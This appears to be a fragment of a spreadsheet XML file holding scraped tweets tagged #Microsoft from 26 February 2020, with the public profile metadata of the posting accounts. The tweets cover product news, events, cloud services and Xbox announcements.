'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1118503605861003264/vOyMN9ee_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1118503605861003264/vOyMN9ee_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18898799/1555507058', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': '00437A', 'profile_sidebar_fill_color': 'CFE2E6', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 10:53:51 +0000 2020</t>
  </si>
  <si>
    <t>Exciting times head in the #NorthWest! 
#Microsoft and @UA92MCR working to bridge skills gap as new office opens https://t.co/grEgyMkjLk by @MicrosoftUK</t>
  </si>
  <si>
    <t>{'id': 22127599, 'id_str': '22127599', 'name': 'ANS', 'screen_name': 'ANSgroup', 'location': 'Manchester &amp; London', 'description': "We are ANS, your Digital and Cloud experts. When you're ready to push boundaries, we'll bring your digital ambitions to life.", 'url': 'http://t.co/eIrExQX4wE', 'entities': {'url': {'urls': [{'url': 'http://t.co/eIrExQX4wE', 'expanded_url': 'http://www.ans.co.uk/', 'display_url': 'ans.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3913, 'friends_count': 3922, 'listed_count': 148, 'created_at': 'Fri Feb 27 10:34:37 +0000 2009', 'favourites_count': 1021, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9902, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '401664', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme10/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1186293623668781056/_XaOpNxc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186293623668781056/_XaOpNxc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22127599/1571669369', 'profile_link_color': '63B546',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</si>
  <si>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10:52:59 +0000 2020</t>
  </si>
  <si>
    <t>Our Dynamics 365 All-Channel Solution is a prime example of an ISV in this market and is provided seamlessly in the browser within Dynamics 365 via Microsofts Channel Integration Framework.
https://t.co/HnzdNwGGuf
#Microsoft #Solgari #Msdyn365 #isv https://t.co/FZ84b35wL9</t>
  </si>
  <si>
    <t>Wed Feb 26 10:52:35 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "18 Sniffers Steal Payment Card Data from Print Store Customers:" https://t.co/849JfpRHPs
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Feb 26 10:50:51 +0000 2020</t>
  </si>
  <si>
    <t>@BillGates Sir i am a Indian , i am want start our own business as a plantation , but no any one support me and telling me that this will be surely waste of money business, please tell me mr. #Microsoft what will be do</t>
  </si>
  <si>
    <t>{'id': 859702109737844736, 'id_str': '859702109737844736', 'name': "why we can't change. (à¤¹à¤® à¤•à¥à¤¯à¥‹à¤‚ à¤¨à¤¹à¥€à¤‚ à¤¬à¤¦à¤² à¤¸à¤•à¤¤à¥‡)", 'screen_name': 'DhaneshMathur', 'location': 'New Delhi, India', 'description': 'we want  the changes because we needed the change and we can change it so we will be change.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 27, 'friends_count': 26, 'listed_count': 0, 'created_at': 'Wed May 03 09:32:10 +0000 2017', 'favourites_count': 3759, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1366, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1219706834317017088/c-MHZM6n_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219706834317017088/c-MHZM6n_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/859702109737844736/1579635731',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</si>
  <si>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10:46:10 +0000 2020</t>
  </si>
  <si>
    <t>Excited to be at Microsoft future decoded @ Bangalore!!! Got a chance to hear directly from #satyanadella 
#Microsoft #microsoftai https://t.co/DNuMdrubqq</t>
  </si>
  <si>
    <t>{'id': 2547329257, 'id_str': '2547329257', 'name': 'Alagunila Meganathan', 'screen_name': 'NilaMeganathan', 'location': 'Rasipuram, Tamil Nadu, India', 'description': 'Founder &amp; CEO at InnovoTree Technologies\nMicrosoft MVP &amp; C# Corner MVP', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 603, 'friends_count': 90, 'listed_count': 7, 'created_at': 'Thu Jun 05 04:06:25 +0000 2014', 'favourites_count': 512, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 828,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'http://pbs.twimg.com/profile_images/920163311483682816/ooTWOOFv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/920163311483682816/ooTWOOFv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2547329257/1522656032',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</si>
  <si>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10:45:17 +0000 2020</t>
  </si>
  <si>
    <t>#IoTnews : #Quectel Collaborates with #Microsoft and #Qualcomm Technologies to Accelerate #InternetOfThings Solutions - #IoT #IoTBusinessNews https://t.co/IUQCxEc5rI</t>
  </si>
  <si>
    <t>{'id': 948191659, 'id_str': '948191659', 'name': 'IoT Business News', 'screen_name': 'iotbusinessnews', 'location': '', 'description': 'IoT Business News is the ultimate news source for all Machine-to-Machine and Internet of Things professionals. Breaking news from the M2M &amp; IoT worlds !', 'url': 'https://t.co/KSysDVO28g', 'entities': {'url': {'urls': [{'url': 'https://t.co/KSysDVO28g', 'expanded_url': 'https://iotbusinessnews.com', 'display_url': 'iotbusinessnews.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22053, 'friends_count': 41, 'listed_count': 621, 'created_at': 'Wed Nov 14 17:48:40 +0000 2012', 'favourites_count': 56, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4688, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EBEBF2', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/693490932122009601/zOTfD2tq_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/693490932122009601/zOTfD2tq_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/948191659/1491224187', 'profile_link_color': '0066CC',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</si>
  <si>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Wed Feb 26 10:45:11 +0000 2020</t>
  </si>
  <si>
    <t>It was fascinating seeing the closing keynote with Nick Wallace, Commercial Director at @Azure at #Oracle #OpenWorld #London.  He was discussing the compatibility with various software's. 
#OOWLON #Microsoft #migration #Azure #ERP #OracleContractors https://t.co/YPTJobfV3Q</t>
  </si>
  <si>
    <t>Wed Feb 26 10:44:12 +0000 2020</t>
  </si>
  <si>
    <t>Google, Microsoft to Accelerate Production Shift Out of China Amid Virus Epidemic, Nikkei ... #Microsoft #Stock #MarketScreener https://t.co/JTzhPI5lhg https://t.co/5hVpcDp4RP</t>
  </si>
  <si>
    <t>Wed Feb 26 10:42:59 +0000 2020</t>
  </si>
  <si>
    <t>Love seeing @emilydcartner putting the Power Platform Adoption Frameworks Enterprise Architecture Model to work at the #UN #PowerPlatform Accelerator in Copenhagen   
Am I right @LeeMBaker? 
#PowerPlatformAF #Microsoft @aisteam https://t.co/pJllmDZ0Ru</t>
  </si>
  <si>
    <t>{'id': 18646095, 'id_str': '18646095', 'name': 'Andrew Welch', 'screen_name': 'andrewdwelch', 'location': 'ðŸ‡ºðŸ‡¸ðŸ‡¬ðŸ‡§ðŸ‡¸ðŸ‡ªðŸŒŽ', 'description': 'Bosnywashingtonian, ðŸ‡¸ðŸ‡ª-ðŸ‡ºðŸ‡¸, frequents London. Microsoft MVP. Leads BizApps @aisteam. #FieldBlendsBook author. @WilliamAndMary alum. @wine30flight. Views own.', 'url': 'https://t.co/9ndwLJGrpr', 'entities': {'url': {'urls': [{'url': 'https://t.co/9ndwLJGrpr', 'expanded_url': 'http://www.RunwayView.com', 'display_url': 'RunwayView.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1323, 'friends_count': 352, 'listed_count': 53, 'created_at': 'Mon Jan 05 21:05:30 +0000 2009', 'favourites_count': 2560, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6733,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'http://pbs.twimg.com/profile_images/1061027735131381763/-wnPOh9l_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1061027735131381763/-wnPOh9l_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18646095/1557588388', 'profile_link_color': '005B99', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': '114399', 'profile_text_color': 'BDBDBD', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 10:42:39 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft officially reveals the specs of the Xbox Series X. https://t.co/A8m6CfeV6Z
#Microsoft #MicrosoftTeams #XboxShare #XboxSeriesX #specs #gamer #gaming #gamingconsole #gamedev https://t.co/N4TxWNj3RX</t>
  </si>
  <si>
    <t>{'id': 1030392806030766081, 'id_str': '1030392806030766081', 'name': 'AppScanLab', 'screen_name': 'lab_app', 'location': 'Gurgaon, India', 'description': 'Discover Your Favourite Apps Here!', 'url': 'https://t.co/GXAqmptHa3', 'entities': {'url': {'urls': [{'url': 'https://t.co/GXAqmptHa3', 'expanded_url': 'http://www.appscanlab.com/', 'display_url': 'appscanlab.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 60, 'friends_count': 69, 'listed_count': 0, 'created_at': 'Fri Aug 17 09:56:03 +0000 2018', 'favourites_count': 642, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 556,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'http://pbs.twimg.com/profile_images/1098894866862374913/QTClt5HN_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1098894866862374913/QTClt5HN_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1030392806030766081/1559394673',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</si>
  <si>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10:42:12 +0000 2020</t>
  </si>
  <si>
    <t>Try out #Microsoft #HoloLens this year at #SkillsHumber where we will be highlighting the applications of mixed reality within design, construction and the built environment. 4th &amp;amp; 5th March @bonusarenahull https://t.co/PgoDnEc7X3</t>
  </si>
  <si>
    <t>{'id': 1089891833881214976, 'id_str': '1089891833881214976', 'name': 'East Riding Infrastructure &amp; Facilities', 'screen_name': 'EastRiding_INF', 'location': 'Beverley, England', 'description': 'A multidisciplinary practice delivering award-winning work from feasibility through to completion.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 96, 'friends_count': 121, 'listed_count': 0, 'created_at': 'Mon Jan 28 14:23:57 +0000 2019', 'favourites_count': 151, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 75, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1230861208506507265/GCcNztI3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230861208506507265/GCcNztI3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1089891833881214976/1582662088',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</si>
  <si>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10:41:33 +0000 2020</t>
  </si>
  <si>
    <t>x #scienxedeluxe # @XEMIDE
 Adapting  science &amp;amp; luxury to our lifestyle
Mobile transportation training support vehicle
#sacher #wien #benz #amg #ambulance #rescue #iot #pediatric #siemens #ai #azure #microsoft 
https://t.co/ePuS44dsT1
https://t.co/ZYki4uVdRH https://t.co/HGVFOjJA2g</t>
  </si>
  <si>
    <t>{'id': 321346830, 'id_str': '321346830', 'name': '@âŽ³Âµx_HS_DMO ä¾åˆäºº', 'screen_name': 'jiwitmanuel', 'location': 'ðŸ‡©ðŸ‡´ðŸ‡ªðŸ‡¸ðŸŽŒðŸ‡ºðŸ‡¸ðŸ‡¦ðŸ‡¹ðŸ‡§ðŸ‡ªðŸ‡³ðŸ‡±ðŸ‡ªðŸ‡º', 'description': 'https://t.co/BuHwTTHIOZ Adapting science to our lifestyle Venture Capitalist Mind #Excellence #Honor ðŸ‡ªðŸ‡¸ðŸ‡§ðŸ‡ªðŸ‡ºðŸ‡¸ðŸ‡¯ðŸ‡µ', 'url': 'https://t.co/sNCCDqjUaV', 'entities': {'url': {'urls': [{'url': 'https://t.co/sNCCDqjUaV', 'expanded_url': 'https://www.linkedin.com/company/xcupware', 'display_url': 'linkedin.com/company/xcupwaâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/BuHwTTHIOZ', 'expanded_url': 'https://www.facebook.com/X.Instituto.nueva.america/', 'display_url': 'facebook.com/X.Instituto.nuâ€¦', 'indices': [0, 23]}]}}, 'protected': False, 'followers_count': 1463, 'friends_count': 200, 'listed_count': 328, 'created_at': 'Tue Jun 21 12:31:32 +0000 2011', 'favourites_count': 20352, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 34133, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '050005', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235873372761923584/z6ReUq08_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235873372761923584/z6ReUq08_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/321346830/1579469588', 'profile_link_color': '333333', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '990000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 10:39:32 +0000 2020</t>
  </si>
  <si>
    <t>Create Rules in Microsoft Outlook to Move Specific person Email Into Specified folder. #microsoft #outlook https://t.co/mE70Qp1rpZ via @YouTube</t>
  </si>
  <si>
    <t>{'id': 1012634240243007490, 'id_str': '1012634240243007490', 'name': 'TechieLAB', 'screen_name': 'techielabbd', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 70, 'listed_count': 1, 'created_at': 'Fri Jun 29 09:49:51 +0000 2018', 'favourites_count': 17,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'http://pbs.twimg.com/profile_images/1212596321602818049/Xi4Li6x7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212596321602818049/Xi4Li6x7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1012634240243007490/1577689578',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</si>
  <si>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10:38:50 +0000 2020</t>
  </si>
  <si>
    <t>Today we're at Microsoft's UK office where Taryn Nixon @tweetingtaryn  and Barry Wakelin are presenting how to successfully roll-out and adopt #O365 and #MSTeams
#microsoft #O365adoption #Teams #digitalworkplace https://t.co/sxvLBRQGp2</t>
  </si>
  <si>
    <t>Wed Feb 26 10:38:04 +0000 2020</t>
  </si>
  <si>
    <t>Xbox - March 2020 Games with Gold
https://t.co/8OkqdzlQqh #GamesWithGold #XboxLive #XboxOneX #XboxOne #Xbox #Microsoft #deadarticgames</t>
  </si>
  <si>
    <t>Wed Feb 26 10:34:16 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Windows10 Home now forces you to #SignIn with a #Microsoft accountunless you disconnect from the Internet first. MS has always wanted U to sign in [...] but now it's going even further  https://t.co/V4UFD9RLlo</t>
  </si>
  <si>
    <t>{'id': 77087484, 'id_str': '77087484', 'name': 'DansLeRuSH', 'screen_name': 'DansLeRuSH', 'location': 'France', 'description': 'Part-Time Coder.\nFrench on https://t.co/6zmLhigY2j ðŸ˜', 'url': 'https://t.co/XUu7jpWbYj', 'entities': {'url': {'urls': [{'url': 'https://t.co/XUu7jpWbYj', 'expanded_url': 'https://dansleru.sh', 'display_url': 'dansleru.sh', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/6zmLhigY2j', 'expanded_url': 'http://bit.ly/Framapiaf', 'display_url': 'bit.ly/Framapiaf', 'indices': [27, 50]}]}}, 'protected': False, 'followers_count': 330, 'friends_count': 101, 'listed_count': 183, 'created_at': 'Fri Sep 25 00:32:49 +0000 2009', 'favourites_count': 2074, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6050,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'http://pbs.twimg.com/profile_images/644234876590399488/WPjFJ5DM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/644234876590399488/WPjFJ5DM_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/77087484/1414767229', 'profile_link_color': '990000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 10:32:41 +0000 2020</t>
  </si>
  <si>
    <t>WoW I have not seen such a bad talk to your employees as this one: https://t.co/CE4tadsZXv
the fastest way to lose your best people and get people unmotivated!
#microsoft #twitch #mixerstreamer #mixer #managment #Entrepreneur #leadership #Balance #business #work #msfail</t>
  </si>
  <si>
    <t>Wed Feb 26 10:26:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Identity Manager is the best solution for businesses looking to secure their #IAM processes.
To find out more about #MIM, check out our #blog. 
#Microsoft #IdentityManagement #AccessManagement
https://t.co/pmJcR6gf2Z https://t.co/glhW50F25X</t>
  </si>
  <si>
    <t>Wed Feb 26 10:24:05 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> NEWS  #pcworld #ProprietarySoftware #malware  #Google and #Microsoft are scaring consumers over Edge extensions, and for what? https://t.co/PBaKb0Nkpx</t>
  </si>
  <si>
    <t>Wed Feb 26 10:22:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft, SBI join hands to create opportunities for differently-abled people
https://t.co/GN4sLYu9O0
#microsoft #microsoftindia #disabilities #jobs2020 #sbi #sbifoundation #financialservices #jobopportunities #hiring #hiringtrends #humancapitalonline #humancapitalmagazine https://t.co/9RZGgC5NiP</t>
  </si>
  <si>
    <t>Wed Feb 26 10:20:09 +0000 2020</t>
  </si>
  <si>
    <t>5 benefits of xPayroll:
 Built within #Microsoft #Dynamics #NAV and #Dynamics365
 User defined earnings, deductions and contributions
 Multi-tiered commissions
 Mass &amp;amp; secure emailing of payslips
Contact us to find out more https://t.co/5tGXiNoWAf #payroll #technology https://t.co/IcJgln1d7E</t>
  </si>
  <si>
    <t>{'id': 3300940918, 'id_str': '3300940918', 'name': 'Xenatus Global', 'screen_name': 'xenatusglobal', 'location': 'Limassol, Cyprus', 'description': 'Xenatus Global is a multi-national Microsoft Dynamics NAV/AX/GP/CRM Certified Implementation Partner, ISV and the Exclusive Distributor of various Dynamics ISV', 'url': 'https://t.co/IhodtcrIQX', 'entities': {'url': {'urls': [{'url': 'https://t.co/IhodtcrIQX', 'expanded_url': 'http://www.xenatusglobal.com', 'display_url': 'xenatusglobal.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25, 'friends_count': 23, 'listed_count': 3, 'created_at': 'Wed May 27 20:52:56 +0000 2015', 'favourites_count': 1, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/727217027903983616/r0HsVEYY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/727217027903983616/r0HsVEYY_normal.jpg',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</si>
  <si>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10:20:06 +0000 2020</t>
  </si>
  <si>
    <t>Loot Boxes Will Be Phased Out From Forza Motorsport 7. #technologyfacts #microsoft https://t.co/Sg0NLAjNki https://t.co/3S7ZzXMydl</t>
  </si>
  <si>
    <t>{'id': 752034576151748608, 'id_str': '752034576151748608', 'name': 'Larry Lowry', 'screen_name': 'larrylowr', 'location': 'Florida, USA', 'description': 'Disconnect is not possible', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4458, 'friends_count': 4689, 'listed_count': 33, 'created_at': 'Sun Jul 10 06:59:50 +0000 2016', 'favourites_count': 11750, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3483, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/784461039245156352/oWo6MmuN_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784461039245156352/oWo6MmuN_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/752034576151748608/1475865035',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</si>
  <si>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10:20:05 +0000 2020</t>
  </si>
  <si>
    <t>In case you didn't know, we're part of the UK Government's G-Cloud framework: https://t.co/UbJ7SwNo6t 
#GCloud11 #MicrosoftGoldPartner #Microsoft #SharePoint #Office365 #UKGovernment</t>
  </si>
  <si>
    <t>Wed Feb 26 10:19:23 +0000 2020</t>
  </si>
  <si>
    <t>Google, #Microsoft shift production from #China faster due to #Coronavirus https://t.co/2J11OerOGl</t>
  </si>
  <si>
    <t>{'id': 234334195, 'id_str': '234334195', 'name': 'Sergei Frolikov', 'screen_name': 'AsuraSerg', 'location': 'Russia', 'description': 'Soyez rÃ©alistes, demandez lâ€™impossible. &amp;  De las cosas mÃ¡s seguras, la mÃ¡s segura es dudar.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10142, 'friends_count': 6669, 'listed_count': 72, 'created_at': 'Wed Jan 05 11:59:38 +0000 2011', 'favourites_count': 1099, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 174984, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '009AB9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/3219011568/6f609e6382a32a57b46a8bbff83be4c9_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3219011568/6f609e6382a32a57b46a8bbff83be4c9_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/234334195/1401208986',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</si>
  <si>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Wed Feb 26 10:15:35 +0000 2020</t>
  </si>
  <si>
    <t>Mover migration for moving files from nearly everywhere to OneDrive and Sharepoint now available worldwide. Take a look:
#mover #o365 #microsoft #OneDrive #SharePoint 
https://t.co/XSFjynaDGb</t>
  </si>
  <si>
    <t>{'id': 329202049, 'id_str': '329202049', 'name': 'Adriano Risuscitazione', 'screen_name': 'Adriano_gX', 'location': 'Switzerland', 'description': 'Love mobile technology &amp; gadgets / Sketchnoter / Partner and Modern Workplace Engineer at GrabX Solutions â˜ï¸', 'url': 'https://t.co/qnEjFcHwcn', 'entities': {'url': {'urls': [{'url': 'https://t.co/qnEjFcHwcn', 'expanded_url': 'http://www.grabx.ch', 'display_url': 'grabx.ch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 275, 'listed_count': 1, 'created_at': 'Mon Jul 04 18:00:00 +0000 2011', 'favourites_count': 263, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 220,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'http://pbs.twimg.com/profile_images/1134418536410091520/_6dFVZOM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1134418536410091520/_6dFVZOM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/329202049/1582720473',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</si>
  <si>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10:15:09 +0000 2020</t>
  </si>
  <si>
    <t>For me, [Azure] has exceeded my wildest expectations. I would never have imagined the global scale, security and services that are available in #Azure today.
-@ThomasMaurer, #Microsoft Senior Cloud Advocate
Read more in our blog: https://t.co/zQLIpXn3rX https://t.co/IP4VoAMhwP</t>
  </si>
  <si>
    <t>Wed Feb 26 10:10:10 +0000 2020</t>
  </si>
  <si>
    <t>Did you ever think you'd see Nick Wallace, Commercial Director at @Azure on stage at #Oracle #OpenWorld? 
Nick was discussing compatibility between various softwares. #OOWLON  #Microsoft #tech #technology #talenterprize https://t.co/kPUydeANH8</t>
  </si>
  <si>
    <t>Wed Feb 26 10:09:42 +0000 2020</t>
  </si>
  <si>
    <t>Did you know? The New #OfficeApp for #Android and #iOS is now generally available. Check out the amazing features #Microsoft has integrated into this incredible app: https://t.co/HZnn2zg74s https://t.co/RFtI1tKPUH</t>
  </si>
  <si>
    <t>{'id': 721976553060634624, 'id_str': '721976553060634624', 'name': 'Ctelecoms', 'screen_name': 'ctelecoms2007', 'location': 'Kingdom of Saudi Arabia', 'description': 'We are an IT company based in Saudi Arabia providing intelligent IT business, IT network and IT infrastructure solutions! Our facebook: https://t.co/qbgWttIPKi', 'url': 'https://t.co/U6G0rVMkG1', 'entities': {'url': {'urls': [{'url': 'https://t.co/U6G0rVMkG1', 'expanded_url': 'http://www.ctelecoms.com.sa/', 'display_url': 'ctelecoms.com.sa', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/qbgWttIPKi', 'expanded_url': 'https://www.facebook.com/ConsolidatedTelecoms/?ref=bookmarks', 'display_url': 'facebook.com/ConsolidatedTeâ€¦', 'indices': [136, 159]}]}}, 'protected': False, 'followers_count': 134, 'friends_count': 339, 'listed_count': 3, 'created_at': 'Mon Apr 18 08:19:58 +0000 2016', 'favourites_count': 936, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1744,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'http://pbs.twimg.com/profile_images/721977620058005504/auOsqlW5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/721977620058005504/auOsqlW5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/721976553060634624/1580206309', 'profile_link_color': 'F88017',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</si>
  <si>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10:08:26 +0000 2020</t>
  </si>
  <si>
    <t>Train WiFi + Remote Desktop = Nope
@AvantiWestCoast #azure #microsoft #remoteworking https://t.co/IIHgSD2g8Z</t>
  </si>
  <si>
    <t>{'id': 394528000, 'id_str': '394528000', 'name': 'ðŸ…ºðŸ…¸ðŸ†ðŸ…º ðŸ†ðŸ†ˆðŸ…°ðŸ…½', 'screen_name': 'kirk__ryan', 'location': 'United Kingdom', 'description': 'ðŸ…µðŸ…¾ðŸ†„ðŸ…½ðŸ…³ðŸ…´ðŸ† &amp; ðŸ…²ðŸ†ƒðŸ…¾ of @busbyio (Rider down &amp; Road Radar) | Principal Technologist | All opinions are my own.', 'url': 'https://t.co/rriw2rimsi', 'entities': {'url': {'urls': [{'url': 'https://t.co/rriw2rimsi', 'expanded_url': 'http://www.k-safe.com', 'display_url': 'k-safe.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 511, 'friends_count': 1105, 'listed_count': 12, 'created_at': 'Thu Oct 20 06:44:01 +0000 2011', 'favourites_count': 619, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 808,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'http://pbs.twimg.com/profile_images/1190827370162376704/GH0xrVlm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190827370162376704/GH0xrVlm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/394528000/1542287056',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</si>
  <si>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10:07:16 +0000 2020</t>
  </si>
  <si>
    <t>Data source: Amazon Annual Report, Digital Commerce 360
#amazon #aws #amazonprime #jeffbezos #shares #business #entrepreneur #entrepreneurship #apple #microsoft #finance #financelookup #amazonprimevideo #amazongo #amazonmusic #amazonbookstore #businessmodel #cloud #cloudservices https://t.co/I7tdHBxGNb</t>
  </si>
  <si>
    <t>Wed Feb 26 10:07:04 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/zZEpHSUZGE</t>
  </si>
  <si>
    <t>Wed Feb 26 10:05:38 +0000 2020</t>
  </si>
  <si>
    <t>I'm ranked 1st in the #Usa #Codingame #Google #Facebook #Microsoft #Uber #NASA https://t.co/Ovj7J2PDIy</t>
  </si>
  <si>
